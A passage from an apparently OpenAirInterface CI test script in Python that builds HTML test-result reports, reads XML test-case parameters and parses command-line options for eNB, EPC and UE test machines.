self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' OAI UE(s) is(are) connected to CI bench</h2>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <ul class="nav nav-pills">\n')
count = 0
while (count < self.nbTestXMLfiles):
pillMsg = ' <li><a data-toggle="pill" href="#'
pillMsg += self.htmlTabRefs[count]
pillMsg += '">'
pillMsg += '__STATE_' + self.htmlTabNames[count] + '__'
pillMsg += self.htmlTabNames[count]
pillMsg += ' <span class="glyphicon glyphicon-'
pillMsg += self.htmlTabIcons[count]
pillMsg += '"></span></a></li>\n'
self.htmlFile.write(pillMsg)
count += 1
self.htmlFile.write(' </ul>\n')
self.htmlFile.write(' <div class="tab-content">\n')
self.htmlFile.close()
def CreateHtmlTabHeader(self):
if (not self.htmlHeaderCreated):
if (not os.path.isfile('test_results.html')):
self.CreateHtmlHeader()
self.htmlFile = open('test_results.html', 'a')
if (self.nbTestXMLfiles == 1):
self.htmlFile.write(' <div id="' + self.htmlTabRefs[0] + '" class="tab-pane fade">\n')
self.htmlFile.write(' <h3>Test Summary for <span class="glyphicon glyphicon-file"></span> ' + self.testXMLfiles[0] + '</h3>\n')
else:
self.htmlFile.write(' <div id="build-tab" class="tab-pane fade">\n')
self.htmlFile.write(' <table class="table" border = "1">\n')
self.htmlFile.write(' <tr bgcolor = "#33CCFF" >\n')
self.htmlFile.write(' <th>Test Id</th>\n')
self.htmlFile.write(' <th>Test Desc</th>\n')
self.htmlFile.write(' <th>Test Options</th>\n')
self.htmlFile.write(' <th>Test Status</th>\n')
if (self.htmlUEConnected == -1):
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <th>UE' + str(i) + ' Status</th>\n')
i += 1
self.htmlFile.write(' </tr>\n')
self.htmlHeaderCreated = True
def CreateHtmlTabFooter(self, passStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th bgcolor = "#33CCFF" colspan=2>Final Tab Status</th>\n')
if passStatus:
self.htmlFile.write(' <th bgcolor = "green" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">PASS <span class="glyphicon glyphicon-ok"></span> </font></th>\n')
else:
self.htmlFile.write(' <th bgcolor = "red" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' </div>\n')
self.htmlFile.close()
time.sleep(1)
if passStatus:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__//' test_results.html"
subprocess.run(cmd, shell=True)
else:
cmd = "sed -i -e 's/__STATE_" + self.htmlTabNames[0] + "__/<span class=\"glyphicon glyphicon-remove\"><\/span>/' test_results.html"
subprocess.run(cmd, shell=True)
self.htmlFooterCreated = False
def CreateHtmlFooter(self, passStatus):
if (os.path.isfile('test_results.html')):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML footer \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'a')
self.htmlFile.write('</div>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <table class="table table-condensed">\n')
machines = [ 'eNB', 'UE' ]
for machine in machines:
res = self.RetrieveSystemVersion(machine)
if res == -1:
continue
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=8>' + str(machine) + ' Server Characteristics</th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>OS Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.OsVersion + '</span></td>\n')
self.htmlFile.write(' <td>Kernel Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.KernelVersion + '</span></td>\n')
self.htmlFile.write(' <td>UHD Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UhdVersion + '</span></td>\n')
self.htmlFile.write(' <td>USRP Board</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.UsrpBoard + '</span></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>Nb CPUs</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuNb + '</span></td>\n')
self.htmlFile.write(' <td>CPU Model Name</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuModel + '</span></td>\n')
self.htmlFile.write(' <td>CPU Frequency</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.CpuMHz + '</span></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=5 bgcolor = "#33CCFF">Final Status</th>\n')
if passStatus:
self.htmlFile.write(' <th colspan=3 bgcolor="green"><font color="white">PASS <span class="glyphicon glyphicon-ok"></span></font></th>\n')
else:
self.htmlFile.write(' <th colspan=3 bgcolor="red"><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <div class="well well-lg">End of Test Report -- Copyright <span class="glyphicon glyphicon-copyright-mark"></span> 2018 <a href="http://www.openairinterface.org/">OpenAirInterface</a>. All Rights Reserved.</div>\n')
self.htmlFile.write('</div></body>\n')
self.htmlFile.write('</html>\n')
self.htmlFile.close()
def CreateHtmlTestRow(self, options, status, processesStatus, machine='eNB'):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
if (processesStatus == 0):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
elif (processesStatus == ENB_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process not found</td>\n')
elif (processesStatus == OAI_UE_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - OAI UE process not found</td>\n')
elif (processesStatus == ENB_PROCESS_SEG_FAULT):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Segmentation Fault</td>\n')
elif (processesStatus == ENB_PROCESS_ASSERTION) or (processesStatus == OAI_UE_PROCESS_ASSERTION):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process ended in Assertion</td>\n')
elif (processesStatus == ENB_PROCESS_REALTIME_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' process faced Real Time issue(s)</td>\n')
elif (processesStatus == ENB_PROCESS_NOLOGFILE_TO_ANALYZE) or (processesStatus == OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE):
self.htmlFile.write(' <td bgcolor = "orange" >OK?</td>\n')
elif (processesStatus == ENB_PROCESS_SLAVE_RRU_NOT_SYNCED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - ' + machine + ' Slave RRU could not synch</td>\n')
elif (processesStatus == OAI_UE_PROCESS_COULD_NOT_SYNC):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - UE could not sync</td>\n')
elif (processesStatus == HSS_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - HSS process not found</td>\n')
elif (processesStatus == MME_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - MME process not found</td>\n')
elif (processesStatus == SPGW_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - SPGW process not found</td>\n')
elif (processesStatus == UE_IP_ADDRESS_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - Could not retrieve UE IP address</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
if (len(str(self.htmleNBFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Reestablishment|Could not copy eNB logfile', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmleNBFailureMsg + '</pre></td>\n')
self.htmleNBFailureMsg = ''
elif (len(str(self.htmlUEFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Could not copy UE logfile|oaitun_ue1 interface is either NOT mounted or NOT configured', self.htmlUEFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' + cellBgColor + '">' + self.htmlUEFailureMsg + '</pre></td>\n')
self.htmlUEFailureMsg = ''
else:
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
def CreateHtmlTestRowQueue(self, options, status, ue_status, ue_queue):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
addOrangeBK = False
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
addOrangeBK = True
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
i = 0
while (i < self.htmlUEConnected):
if (i < ue_status):
if (not ue_queue.empty()):
if (addOrangeBK):
self.htmlFile.write(' <td bgcolor = "orange" >' + str(ue_queue.get()).replace('white', 'orange') + '</td>\n')
else:
self.htmlFile.write(' <td>' + str(ue_queue.get()) + '</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
#-----------------------------------------------------------
# ShowTestID()
#-----------------------------------------------------------
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# Usage()
#-----------------------------------------------------------
def Usage():
print('------------------------------------------------------------')
print('main.py Ver:' + Version)
print('------------------------------------------------------------')
print('Usage: python main.py [options]')
print(' --help Show this help.')
print(' --mode=[Mode]')
print(' TesteNB')
print(' InitiateHtml, FinalizeHtml')
	print('      TerminateeNB, TerminateUE, TerminateOAIUE, TerminateHSS, TerminateMME, TerminateSPGW')
	print('      LogCollectBuild, LogCollecteNB, LogCollectHSS, LogCollectMME, LogCollectSPGW, LogCollectPing, LogCollectIperf, LogCollectOAIUE')
print(' --eNBRepository=[eNB\'s Repository URL] or --ranRepository=[OAI RAN Repository URL]')
	print('  --eNBBranch=[eNB\'s Branch Name] or --ranBranch=[OAI RAN Repository Branch]')
	print('  --eNBCommitID=[eNB\'s Commit Number] or --ranCommitID=[OAI RAN Repository Commit SHA-1]')
print(' --eNB_AllowMerge=[eNB\'s Allow Merge Request (with target branch)] or --ranAllowMerge=true/false')
print(' --eNBTargetBranch=[eNB\'s Target Branch in case of a Merge Request] or --ranTargetBranch=[Target Branch]')
print(' --eNBIPAddress=[eNB\'s IP Address]')
print(' --eNBUserName=[eNB\'s Login User Name]')
print(' --eNBPassword=[eNB\'s Login Password]')
print(' --eNBSourceCodePath=[eNB\'s Source Code Path]')
print(' --EPCIPAddress=[EPC\'s IP Address]')
print(' --EPCUserName=[EPC\'s Login User Name]')
print(' --EPCPassword=[EPC\'s Login Password]')
print(' --EPCSourceCodePath=[EPC\'s Source Code Path]')
print(' --EPCType=[EPC\'s Type: OAI or ltebox]')
print(' --ADBIPAddress=[ADB\'s IP Address]')
print(' --ADBUserName=[ADB\'s Login User Name]')
print(' --ADBPassword=[ADB\'s Login Password]')
print(' --XMLTestFile=[XML Test File to be run]')
print('------------------------------------------------------------')
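# Example invocation (the IP address and credentials below are placeholders):
#   python main.py --mode=TerminateeNB --eNBIPAddress=192.168.1.10 --eNBUserName=oaici --eNBPassword=linux
#-----------------------------------------------------------
# CheckClassValidity()
#-----------------------------------------------------------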
def CheckClassValidity(action,id):
	if action not in ('Build_eNB', 'WaitEndBuild_eNB', 'Initialize_eNB', 'Terminate_eNB',
			'Initialize_UE', 'Terminate_UE', 'Attach_UE', 'Detach_UE',
			'Build_OAI_UE', 'Initialize_OAI_UE', 'Terminate_OAI_UE',
			'DataDisable_UE', 'DataEnable_UE', 'CheckStatusUE',
			'Ping', 'Iperf', 'Reboot_UE',
			'Initialize_FlexranCtrl', 'Terminate_FlexranCtrl',
			'Initialize_HSS', 'Terminate_HSS',
			'Initialize_MME', 'Terminate_MME',
			'Initialize_SPGW', 'Terminate_SPGW',
			'Initialize_CatM_module', 'Terminate_CatM_module',
			'Attach_CatM_module', 'Detach_CatM_module', 'Ping_CatM_module',
			'IdleSleep', 'Perform_X2_Handover'):
logging.debug('ERROR: test-case ' + id + ' has wrong class ' + action)
return False
return True
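#-----------------------------------------------------------
# GetParametersFromXML()
#-----------------------------------------------------------
# Reads the optional per-test-case parameters from the XML <testCase> element and
# stores them on the SSH object; missing fields fall back to defaults
# (instance/server id '0', 'balanced' iperf profile, 5 s idle sleep, ...).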
def GetParametersFromXML(action):
if action == 'Build_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
xmlBgBuildField = test.findtext('backgroundBuild')
if (xmlBgBuildField is None):
SSH.backgroundBuild = False
else:
if re.match('true', xmlBgBuildField, re.IGNORECASE):
SSH.backgroundBuild = True
else:
SSH.backgroundBuild = False
if action == 'WaitEndBuild_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Initialize_eNB':
SSH.Initialize_eNB_args = test.findtext('Initialize_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Terminate_eNB':
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
SSH.eNB_serverId = test.findtext('eNB_serverId')
if (SSH.eNB_serverId is None):
SSH.eNB_serverId = '0'
if action == 'Attach_UE':
nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
if (nbMaxUEtoAttach is None):
SSH.nbMaxUEtoAttach = -1
else:
SSH.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
if action == 'CheckStatusUE':
expectedNBUE = test.findtext('expectedNbOfConnectedUEs')
if (expectedNBUE is None):
SSH.expectedNbOfConnectedUEs = -1
else:
SSH.expectedNbOfConnectedUEs = int(expectedNBUE)
if action == 'Build_OAI_UE':
SSH.Build_OAI_UE_args = test.findtext('Build_OAI_UE_args')
if action == 'Initialize_OAI_UE':
SSH.Initialize_OAI_UE_args = test.findtext('Initialize_OAI_UE_args')
SSH.UE_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Terminate_OAI_UE':
		SSH.UE_instance = test.findtext('UE_instance')
if (SSH.UE_instance is None):
SSH.UE_instance = '0'
if action == 'Ping' or action == 'Ping_CatM_module':
SSH.ping_args = test.findtext('ping_args')
SSH.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
if action == 'Iperf':
SSH.iperf_args = test.findtext('iperf_args')
SSH.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
SSH.iperf_profile = test.findtext('iperf_profile')
if (SSH.iperf_profile is None):
SSH.iperf_profile = 'balanced'
else:
if SSH.iperf_profile != 'balanced' and SSH.iperf_profile != 'unbalanced' and SSH.iperf_profile != 'single-ue':
logging.debug('ERROR: test-case has wrong profile ' + SSH.iperf_profile)
SSH.iperf_profile = 'balanced'
if action == 'IdleSleep':
string_field = test.findtext('idle_sleep_time_in_sec')
if (string_field is None):
SSH.idle_sleep_time = 5
else:
SSH.idle_sleep_time = int(string_field)
if action == 'Perform_X2_Handover':
string_field = test.findtext('x2_ho_options')
if (string_field is None):
SSH.x2_ho_options = 'network'
else:
if string_field != 'network':
logging.error('ERROR: test-case has wrong option ' + string_field)
SSH.x2_ho_options = 'network'
else:
SSH.x2_ho_options = string_field
#Check whether a given test ID is covered by a list of patterns:
#it matches if one of the strings in 'list' is a prefix of 'test' (a trailing '+' is stripped first).
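#Example: test_in_list('030201', ['0302+']) returns True because '030201' starts with '0302'.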
def test_in_list(test, list):
for check in list:
check=check.replace('+','')
if (test.startswith(check)):
return True
return False
def receive_signal(signum, frame):
sys.exit(1)
#-----------------------------------------------------------
# Parameter Check
#-----------------------------------------------------------
mode = ''
SSH = SSHConnection()
argvs = sys.argv
argc = len(argvs)
cwd = os.getcwd()
while len(argvs) > 1:
myArgv = argvs.pop(1) # 0th is this file's name
if re.match('^\-\-help$', myArgv, re.IGNORECASE):
Usage()
sys.exit(0)
elif re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE)
mode = matchReg.group(1)
	elif re.match('^\-\-eNBRepository=(.+)$|^\-\-ranRepository=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranRepository=(.+)$', myArgv, re.IGNORECASE)
SSH.ranRepository = matchReg.group(1)
elif re.match('^\-\-eNB_AllowMerge=(.+)$|^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranAllowMerge=(.+)$', myArgv, re.IGNORECASE)
doMerge = matchReg.group(1)
if ((doMerge == 'true') or (doMerge == 'True')):
SSH.ranAllowMerge = True
elif re.match('^\-\-eNBBranch=(.+)$|^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.ranBranch = matchReg.group(1)
elif re.match('^\-\-eNBCommitID=(.*)$|^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranCommitID=(.*)$', myArgv, re.IGNORECASE)
SSH.ranCommitID = matchReg.group(1)
elif re.match('^\-\-eNBTargetBranch=(.*)$|^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE)
else:
matchReg = re.match('^\-\-ranTargetBranch=(.*)$', myArgv, re.IGNORECASE)
SSH.ranTargetBranch = matchReg.group(1)
elif re.match('^\-\-eNBIPAddress=(.+)$|^\-\-eNB[1-2]IPAddress=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBIPAddress = matchReg.group(1)
elif re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1IPAddress = matchReg.group(1)
elif re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2IPAddress = matchReg.group(1)
elif re.match('^\-\-eNBUserName=(.+)$|^\-\-eNB[1-2]UserName=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBUserName = matchReg.group(1)
elif re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1UserName = matchReg.group(1)
elif re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2UserName = matchReg.group(1)
elif re.match('^\-\-eNBPassword=(.+)$|^\-\-eNB[1-2]Password=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBPassword = matchReg.group(1)
elif re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1Password = matchReg.group(1)
elif re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2Password = matchReg.group(1)
elif re.match('^\-\-eNBSourceCodePath=(.+)$|^\-\-eNB[1-2]SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBSourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1SourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2SourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCIPAddress = matchReg.group(1)
elif re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCBranch = matchReg.group(1)
elif re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCUserName = matchReg.group(1)
elif re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCPassword = matchReg.group(1)
elif re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE)
if re.match('OAI', matchReg.group(1), re.IGNORECASE) or re.match('ltebox', matchReg.group(1), re.IGNORECASE):
SSH.EPCType = matchReg.group(1)
else:
sys.exit('Invalid EPC Type: ' + matchReg.group(1) + ' -- (should be OAI or ltebox)')
elif re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBIPAddress = matchReg.group(1)
elif re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBUserName = matchReg.group(1)
elif re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBPassword = matchReg.group(1)
elif re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE)
SSH.testXMLfiles.append(matchReg.group(1))
SSH.nbTestXMLfiles += 1
elif re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.UEIPAddress = matchReg.group(1)
elif re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.UEUserName = matchReg.group(1)
elif re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.UEPassword = matchReg.group(1)
elif re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.UESourceCodePath = matchReg.group(1)
elif re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE)
finalStatus = matchReg.group(1)
if ((finalStatus == 'true') or (finalStatus == 'True')):
SSH.finalStatus = True
else:
Usage()
sys.exit('Invalid Parameter: ' + myArgv)
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.eNB_serverId = '0'
SSH.eNB_instance = '0'
SSH.eNBSourceCodePath = '/tmp/'
SSH.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateUE()
elif re.match('^TerminateOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateOAIUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
if (SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '') and (SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == ''):
Usage()
